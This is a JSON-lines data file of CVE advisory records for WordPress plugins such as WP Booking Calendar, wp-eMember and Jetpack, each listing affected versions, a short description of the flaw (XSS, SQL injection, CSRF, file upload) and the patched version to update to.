{"CVE_ID":"CVE-2024-9882","slug":"salon-booking-system","versionImpact":"10.9.3","versionEndExcluding":"10.9.4","description":"The Salon Booking System, Appointment Scheduling for Salons, Spas & Small Businesses WordPress plugin before 1.9.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 10.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f7667fd-6ac6-4c90-aaf0-c7862bd8e9bd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f7667fd-6ac6-4c90-aaf0-c7862bd8e9bd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13323","slug":"booking","versionImpact":"10.9.2","versionEndExcluding":"10.9.3","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'booking' shortcode in all versions up to, and including, 10.9.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 10.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/js\\\/client.js#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/trunk\\\/js\\\/client.js#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220625\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220625\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37731e51-33ce-4ef3-8a13-976c005dc983?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37731e51-33ce-4ef3-8a13-976c005dc983?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3254","slug":"wp-reviews-plugin-for-google","versionImpact":"10.9","versionEndExcluding":"10.9.1","description":"The Widgets for Google Reviews plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 10.9. This is due to missing or incorrect nonce validation within setup_no_reg_header.php. This makes it possible for unauthenticated attackers to reset plugin settings and remove reviews via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 10.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70968476-b064-477f-999f-4aa2c51d89cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70968476-b064-477f-999f-4aa2c51d89cc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980022%40wp-reviews-plugin-for-google%2Ftrunk&old=2977531%40wp-reviews-plugin-for-google%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2980022%40wp-reviews-plugin-for-google%2Ftrunk&old=2977531%40wp-reviews-plugin-for-google%2Ftrunk&sfp_email=&sfph_mail=#file8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0261","slug":"wp-tripadvisor-review-slider","versionEndExcluding":"10.8","description":"The WP TripAdvisor Review Slider WordPress plugin before 10.8 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3b6752-8d72-4ab4-9d49-b722a947d2b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6a3b6752-8d72-4ab4-9d49-b722a947d2b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5081","slug":"wp-emember","versionEndExcluding":"10.7.0","description":"The wp-eMember WordPress plugin before v10.7.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 10.7.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f02bdb5-5cf6-4519-9586-fd4fb3d45dea\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4f02bdb5-5cf6-4519-9586-fd4fb3d45dea\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5744","slug":"wp-emember","versionImpact":"10.6.6","versionEndExcluding":"10.6.7","description":"The wp-eMember WordPress plugin before 10.6.7 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers","recommendation":"Update to version 10.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba50e25c-7250-4025-a72f-74f8eb756246\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ba50e25c-7250-4025-a72f-74f8eb756246\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5715","slug":"wp-emember","versionImpact":"10.6.6","versionEndExcluding":"10.6.7","description":"The wp-eMember WordPress plugin before 10.6.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 10.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d86bc001-51ae-4dcc-869b-80c91251cc2e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d86bc001-51ae-4dcc-869b-80c91251cc2e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5079","slug":"wp-emember","versionImpact":"10.6.6","versionEndExcluding":"10.6.7","description":"The wp-eMember WordPress plugin before 10.6.7 does not sanitise and escape some of the fields when members register, which allows unauthenticated users to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 10.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb5509e-80ab-4e47-83a4-9347796eec40\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdb5509e-80ab-4e47-83a4-9347796eec40\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5080","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not validate files to be uploaded, which could allow admins to upload arbitrary files such as PHP on the server","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f78aad-001c-4219-aa7e-46537e1357a2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15f78aad-001c-4219-aa7e-46537e1357a2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5077","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00fcbcf3-41ee-45e7-a0a9-0d46cb7ef859\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/00fcbcf3-41ee-45e7-a0a9-0d46cb7ef859\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5076","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01cbc841-a30f-4df5-ab7f-0c2c7469657b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/01cbc841-a30f-4df5-ab7f-0c2c7469657b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5075","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b47d93d6-5511-451a-853f-c8b0fba20969\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b47d93d6-5511-451a-853f-c8b0fba20969\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5074","slug":"wp-emember","versionImpact":"10.6.5","versionEndExcluding":"10.6.6","description":"The wp-eMember WordPress plugin before 10.6.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 10.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/174a2ba8-0215-480f-93ec-83ebc4a3200e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/174a2ba8-0215-480f-93ec-83ebc4a3200e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10893","slug":"booking","versionImpact":"10.6.4","versionEndExcluding":"10.6.5","description":"The WP Booking Calendar WordPress plugin before 10.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 10.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a230a552-3fda-4145-810f-58af540107db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a230a552-3fda-4145-810f-58af540107db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10027","slug":"booking","versionImpact":"10.6.2","versionEndExcluding":"10.6.3","description":"The WP Booking Calendar WordPress plugin before 10.6.3 does not sanitise and escape some of its Widgets settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 10.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a94c7b64-720a-47f1-a74a-691c3a9ed3a1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a94c7b64-720a-47f1-a74a-691c3a9ed3a1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9306","slug":"booking","versionImpact":"10.6","versionEndExcluding":"10.6.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 10.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. In addition, site administrators have the option to grant lower-level users with access to manage the plugin's settings which may extend this vulnerability to those users.","recommendation":"Update to version 10.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128d45ec-941c-414c-b341-9964dc748132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/128d45ec-941c-414c-b341-9964dc748132?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161259%40booking&new=3158531%40booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3161259%40booking&new=3158531%40booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8274","slug":"booking","versionImpact":"10.5","versionEndExcluding":"10.5.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters from 'timeline_obj' in all versions up to, and including, 10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 10.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83804c2a-2c4a-4f69-b833-dcd53ddab94d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83804c2a-2c4a-4f69-b833-dcd53ddab94d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/tags\\\/10.4\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php#L520\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking\\\/tags\\\/10.4\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php#L520\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143364\\\/booking\\\/trunk\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php?old=3139443&old_path=booking%2Ftrunk%2Fcore%2Ftimeline%2Fv2%2Fwpbc-class-timeline_v2.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3143364\\\/booking\\\/trunk\\\/core\\\/timeline\\\/v2\\\/wpbc-class-timeline_v2.php?old=3139443&old_path=booking%2Ftrunk%2Fcore%2Ftimeline%2Fv2%2Fwpbc-class-timeline_v2.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11582","slug":"subscribe2","versionImpact":"10.43","versionEndExcluding":"10.44","description":"The Subscribe2 \u2013 Form, Email Subscribers & Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ip parameter in all versions up to, and including, 10.43 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 10.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/tags\\\/10.43\\\/classes\\\/class-s2-list-table.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subscribe2\\\/tags\\\/10.43\\\/classes\\\/class-s2-list-table.php#L72\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36777e39-be45-41f2-beca-2971e15b77cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36777e39-be45-41f2-beca-2971e15b77cd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4749","slug":"wp-emember","versionImpact":"10.3.8","versionEndExcluding":"10.3.9","description":"The wp-eMember WordPress plugin before 10.3.9 does not sanitize and escape the \"fieldId\" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.","recommendation":"Update to version 10.3.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cc05a33-6592-4d35-8e66-9b6a9884df7e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cc05a33-6592-4d35-8e66-9b6a9884df7e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3229","slug":"salon-booking-system","versionImpact":"10.2","versionEndExcluding":"10.3","description":"The Salon booking system plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the SLN_Action_Ajax_ImportAssistants function along with missing authorization checks in all versions up to, and including, 10.2. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bbbf5be-5c0a-4514-88ac-003083c0bba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bbbf5be-5c0a-4514-88ac-003083c0bba3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103584\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/ImportAssistants.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3103584\\\/salon-booking-system\\\/trunk\\\/src\\\/SLN\\\/Action\\\/Ajax\\\/ImportAssistants.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6790","slug":"quiz-master-next","versionImpact":"10.2.2","versionEndExcluding":"10.2.3","description":"The Quiz and Survey Master (QSM)  WordPress plugin before 10.2.3 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"Update to version 10.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af337f9f-c955-49eb-9675-2f85da96fcfe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af337f9f-c955-49eb-9675-2f85da96fcfe\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af337f9f-c955-49eb-9675-2f85da96fcfe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/af337f9f-c955-49eb-9675-2f85da96fcfe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4858","slug":"testimonials-carousel-elementor","versionImpact":"10.2.0","versionEndExcluding":"10.2.1","description":"The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_testimonials_option_callback' function in versions up to, and including, 10.2.0. This makes it possible for unauthenticated attackers to update the OpenAI API key, disabling the feature.","recommendation":"Update to version 10.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f589345-a081-4d27-ac4a-6edc44b96f91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f589345-a081-4d27-ac4a-6edc44b96f91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php#L126\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092154\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092154\\\/testimonials-carousel-elementor\\\/trunk\\\/class-testimonials-carousel-elementor.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4698","slug":"testimonials-carousel-elementor","versionImpact":"10.1.1","versionEndExcluding":"10.2.0","description":"The Testimonial Carousel For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'show_line_text ' and 'slide_button_hover_animation' parameters in versions up to, and including, 10.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 10.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4542b0f8-c9ee-4992-b737-e5f727c7b5b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4542b0f8-c9ee-4992-b737-e5f727c7b5b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-bottom.php#L1478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-bottom.php#L1478\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-centered.php#L1619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-centered.php#L1619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-gallery-coverflow.php#L1876\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-gallery-coverflow.php#L1876\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-logo.php#L1715\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-logo.php#L1715\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel.php#L1847\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel.php#L1847\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-blog.php#L1076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/testimonials-carousel-elementor\\\/trunk\\\/widgets\\\/testimonials-carousel\\\/class-testimonialscarousel-blog.php#L1076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087862\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087862\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13821","slug":"booking","versionImpact":"10.10","versionEndExcluding":"10.10.1","description":"The WP Booking Calendar plugin for WordPress is vulnerable to Unauthenticated Post-Confirmation Booking Manipulation in all versions up to, and including, 10.10. This is due to the plugin not properly requiring re-verification after a booking has been made and a change is being attempted. This makes it possible for unauthenticated attackers to manipulate their confirmed bookings, even after they have been approved.","recommendation":"Update to version 10.10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234469%40booking&new=3234469%40booking&sfp_email=&sfph_mail=#file20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234469%40booking&new=3234469%40booking&sfp_email=&sfph_mail=#file20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a0b961e-ccc3-4da0-b007-bbafa133a3a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a0b961e-ccc3-4da0-b007-bbafa133a3a8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5429","slug":"information-reel","versionImpact":"10.0","versionEndExcluding":"10.1","description":"The Information Reel plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 10.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985373\\\/information-reel#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2985373\\\/information-reel#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64db63e5-ff76-494a-be4f-d820f0cc9ab0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64db63e5-ff76-494a-be4f-d820f0cc9ab0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/information-reel\\\/trunk\\\/information-reel.php?rev=2827123#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/information-reel\\\/trunk\\\/information-reel.php?rev=2827123#L134\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9926","slug":"jetpack","versionImpact":"9.9.2","versionEndExcluding":"10.0.2","description":"The Jetpack WordPress plugin does not have proper authorisation in one of its REST endpoint, allowing any authenticated users, such as subscriber to read arbitrary feedbacks data sent via the Jetpack Contact Form","recommendation":"Update to one of the following versions, or a newer patched version: 10.0.2, 10.1.2, 10.2.3, 10.3.2, 10.4.2, 10.5.3, 10.6.2, 10.7.2, 10.8.2, 10.9.3, 11.0.2, 11.1.4, 11.2.2, 11.3.4, 11.4.2, 11.5.3, 11.6.2, 11.7.3, 11.8.6, 11.9.3, 12.0.2, 12.1.2, 12.2.2, 12.3.1, 12.4.1, 12.5.1, 12.6.3, 12.7.2, 12.8.2, 12.9.4, 13.0.1, 13.1.4, 13.2.3, 13.3.2, 13.4.4, 13.5.1, 13.6.1, 13.7.1, 13.8.2, 13.9.1, 3.9.10, 4.0.7, 4.1.4, 4.2.5, 4.3.5, 4.4.5, 4.5.3, 4.6.3, 4.7.4, 4.8.5, 4.9.3, 5.0.3, 5.1.4, 5.2.5, 5.3.4, 5.4.4, 5.5.5, 5.6.5, 5.7.5, 5.8.4, 5.9.4, 6.0.4, 6.1.5, 6.2.5, 6.3.7, 6.4.6, 6.5.4, 6.6.5, 6.7.4, 6.8.5, 6.9.4, 7.0.5, 7.1.5, 7.2.5, 7.3.5, 7.4.5, 7.5.7, 7.6.4, 7.7.6, 7.8.4, 7.9.4, 8.0.3, 8.1.4, 8.2.6, 8.3.3, 8.4.5, 8.5.3, 8.6.4, 8.7.4, 8.8.5, 8.9.4, 9.0.5, 9.1.3, 9.2.4, 9.3.5, 9.4.4, 9.5.5, 9.6.4, 9.7.3, 9.8.3, 9.9.3","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/669382af-f836-4896-bdcb-5c6a57c99bd9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/669382af-f836-4896-bdcb-5c6a57c99bd9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
